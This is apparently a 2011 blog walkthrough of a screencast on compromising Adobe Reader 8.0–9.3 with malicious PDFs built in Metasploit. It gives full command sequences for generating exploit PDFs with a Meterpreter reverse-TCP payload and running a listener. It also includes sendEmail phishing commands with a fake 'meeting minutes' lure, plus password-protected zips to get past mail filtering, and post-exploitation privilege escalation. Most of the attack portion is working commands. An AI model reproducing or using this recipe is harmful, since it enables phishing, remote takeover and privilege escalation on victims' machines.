Metasploit vs. Adobe PDFs

This screencast demonstrates vulnerabilities in Adobe PDF Reader. Instead of creating a mass of vulnerable files , the attacker creates two PDFs (one relies on no user interaction and crashes the reader whereas the other one require the user to click through a few warning screens, however is then presented with a document).

The attacker emails these documents to the target (however they have to compress & encrypt the documents).

Links

Watch video on-line:

Download video: http://download.g0tmi1k.com/videos_archive/Metasploit_Vs_Adobe_PDFs.mp4

Tools

  • Metasploit – (Can be found on BackTrack 4-R2). Download here
  • SendEmail + SMTP details – (SendEmail can be found on BackTrack 4-R2). Download sendemail here
  • A PDF document (Either create your own or can be found by using an Internet search engine).
  • The target will need a vulnerable version of Adobe Reader (v9.3 for example). Download here

Method

  • Start network services and obtain an IP address
  • Run metasploit and search for PDF exploits
  • Configure exploit and create a vulnerable file**
  • Compress and encrypt PDF
  • Socially engineer an email to the target and attach file
  • Wait for target to download and open file
  • Game Over
  • Locate a "legit" PDF document and bind with exploit
  • Compress and encrypt PDF document
  • Socially engineer an email to the target and attach file
  • Wait for target to download and open file
  • Game Over ...again

Commands

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
start-network
dhclient eth0

msfconsole
search pdf
use windows/fileformat/adobe_libtiff
info
show options
set FILENAME evil.pdf
setg OUTPUTPATH /root
setg PAYLOAD windows/meterpreter/reverse_tcp
setg LHOST 192.168.0.33
setg LPORT 4444
show options
exploit
use exploit/multi/handler
show options
exploit

zip meeting.zip evil.pdf
sendEmail -f "Attacker <badguy@internet.com>" -t g0tmi1ks_target@inter.net -u "Top secret stuff" -m "Here are the minutes from the last meeting." -a /root/meeting.zip -s [smtp host] -xu [smtp user] -xp [smtp pass]
zip -e meeting.zip evil.pdf
g0tmi1k
g0tmi1k
sendEmail -f "Attacker <badguy@internet.com>" -t g0tmi1ks_target@inter.net -u "Top secret stuff" -m "Here are the minutes from the last meeting. The password is: g0tmi1k" -a /root/meeting.zip -s [smtp host] -xu [smtp user] -xp [smtp pass]

#Firefox -> Google-> filetype:PDF magic ponies -> Save: good.pdf

#IE -> [target's online email] -> Login -> Download FatPlayer -> Download & Open

use windows/fileformat/adobe_pdf_embedded_exe
info
show options
set FILENAME evil2.pdf
#set EXENAME evil.exe   #ENCODE
set LAUNCH_MESSAGE Be sure to re-save when shown and then click open.
set INFILENAME /root/good.pdf
show options
exploit
use exploit/multi/handler
show options
exploit -j

zip -e meeting2.zip evil2.pdf
g0tmi1k
g0tmi1k
sendEmail -f "Attacker" -t [target]AT[target]DOT[target] -u "Top secret stuff v2" -m "If you can't open the first email, try this one. The password is: g0tmi1k" -a /root/meeting2.zip -s [smtp host] -xu [smtp user] -xp [smtp pass]

#IE -> [target's online email] -> Login -> Download, extract, run

sessions -l -v
sessions -i 2
sysinfo
getuid
getsystem
getuid

Walkthrough

The attacker approaches this attack similar to a previous method, however instead of producing a collection of different files, which are not going to be used, they choose to use a program which is very commonly installed (also not often kept up-to-date!), Adobe Reader.

To start things going, the attacker starts their network connection and runs metasploit. When metasploit is ready, they search it's database for known exploits for PDFs files. "windows/fileformat/adobe_libtiff" has the latest Disclosure Date (2010-02-16) to today's date (2011-03-22). After choosing it and looking at the exploit in more detail, the attacker notes the vulnerable version of Adobe Reader (versions 8.0 - 8.2, 9.0 - 9.3) which the target HAS to have for this exploit to work.

The attacker then proceeds to enter all the necessary information for the exploit to function, then creates the exploit when it is ready.

Like before, the attacker chooses to socially engineer the target by sending them an email, however this time around they wants to attach & embed the file instead of linking to it remotely.

The attacker enters a brief description of what the PDF is meant to contain. However, when the attacker tries to see the PDF the SMTP disallows the PDF attachment. The attacker compresses and encrypts the PDF which will prevent detection (The attacker alters the original message to include the password).

The attacker can sit back and relax until the target opens the PDF document... which the target does =). However! When the target opens the PDF document, the reader "crashes" before they could read the document. So they email back saying they are unable to read it. The attacker then replies with the "correct" PDF...

This time, the attacker wants to "bind" an exploit to the "legit" PDF. So after searching metasploits database, they locate "windows/fileformat/adobe_pdf_embedded_exe".

Again, the attacker then proceds to enter all the necessary information for the exploit to function, creates the new document and delivers it using the same method as before. Just like before, there is nothing left for the attacker to do except to wait for the target to open the document...

After the target has refreshed their inbox, they notice they have got the "correct" PDF. Upon opening the file, a "Save as" window pops up (1), and of course they wish to save the PDF or just want to read the document so they just click next... After reading the message (2), they click on "open". After doing those steps the target is able to read the document...

...meanwhile the exploit has worked and the attacker has another meterpreter shell on the targets machine.

(1) This is really a meterpreter agent, NOT the PDF file which it says it was. It has cloned the filename from the PDF the attacker used

(2) The message is what the attacker left ;)

Notes

  • You will need to find/use your own SMTP details.
  • Avast anti-virus detected the PDFs (2011-03-23), other Anti-Virus may as well.

Song: New Zealand Shapeshifter - The Touch (Netsky remix) & New Zealand Shapeshifter - Lifetime (Logistics remix)

Video length: 9:07

Capture length: 32:22

Blog Post: https://blog.g0tmi1k.com/2011/03/metasploit-vs-adobe-pdfs/